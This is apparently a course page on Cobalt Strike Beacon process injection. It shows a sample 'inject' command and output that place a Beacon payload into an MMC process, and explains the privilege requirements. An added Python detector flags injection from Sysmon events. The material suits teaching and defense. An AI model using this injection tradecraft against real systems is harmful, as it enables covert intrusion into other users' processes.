# Process Injection

Process injection allows us to inject arbitrary shellcode into a process of our choosing. You can only inject into processes that you can obtain a handle to with enough privileges to write into their memory. In a non-elevated context, this usually limits you to your own processes. In an elevated context, this includes processes owned by other users.

Beacon has two main injection commands: `shinject` and `inject`. `shinject` injects arbitrary shellcode from a binary file on your attacking machine, and `inject` injects a full Beacon payload for the specified listener.

If we wanted to inject a TCP Beacon payload into the MMC process mentioned in the previous module, we could do:

```
beacon> inject 4464 x64 tcp-local
[*] Tasked beacon to inject windows/beacon_bind_tcp (127.0.0.1:4444) into 4464 (x64)
[+] established link to child beacon: 10.10.123.102
```

Where:

* 4464 is the target PID.
* x64 is the architecture of the process.
* tcp-local is the listener name.

The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.

![](https://files.cdn.thinkific.com/file_uploads/584845/images/49e/e38/b9f/injection.png)

The same caveats also apply: if the user closes this process, the Beacon will be lost. The injected shellcode uses the Exit Thread function, so it won't kill the process if we exit the Beacon.
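From the defender's side, the handle requirement described at the top of this page is what makes injection observable. The following is an added example, not part of the original course material: it correlates Sysmon-style ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) records to flag a source process that opened a write-and-thread-capable handle and then started a thread in the same target. The sample events are constructed, and it assumes events have already been parsed into dicts keyed by Sysmon field names.

```python
# Process access rights (values from winnt.h).
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_WRITE = 0x0020
# A handle needs all three to allocate, write and start a thread remotely.
INJECTION_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Constructed sample events (not real telemetry), already parsed into dicts.
SAMPLE_EVENTS = [
    {"EventID": 10, "SourceProcessId": 5120, "TargetProcessId": 4464,
     "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\mmc.exe", "GrantedAccess": "0x1FFFFF"},
    # Read/query-only handle: common and not sufficient for injection.
    {"EventID": 10, "SourceProcessId": 888, "TargetProcessId": 4464,
     "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\mmc.exe", "GrantedAccess": "0x1410"},
    # Write-capable handle with no remote thread afterwards: not reported.
    {"EventID": 10, "SourceProcessId": 2300, "TargetProcessId": 700,
     "SourceImage": r"C:\Tools\debugger.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x2A"},
    {"EventID": 8, "SourceProcessId": 5120, "TargetProcessId": 4464,
     "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\System32\mmc.exe"},
]


def grants_injection_rights(granted_access: str) -> bool:
    """True if the hex GrantedAccess mask contains every right in INJECTION_MASK."""
    return (int(granted_access, 16) & INJECTION_MASK) == INJECTION_MASK


def find_injection_candidates(events):
    """Return (source_pid, target_pid) pairs that opened an injection-capable
    handle and later created a remote thread in the same target."""
    opened, hits = set(), []
    for ev in events:  # events are assumed to be in chronological order
        pair = (ev["SourceProcessId"], ev["TargetProcessId"])
        if ev["EventID"] == 10 and grants_injection_rights(ev["GrantedAccess"]):
            opened.add(pair)
        elif ev["EventID"] == 8 and pair in opened:
            hits.append(pair)
    return hits


if __name__ == "__main__":
    for src, dst in find_injection_candidates(SAMPLE_EVENTS):
        print(f"possible injection: PID {src} -> PID {dst}")
```

Not every injection technique creates a remote thread, so treat a match as a lead to triage rather than complete coverage.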
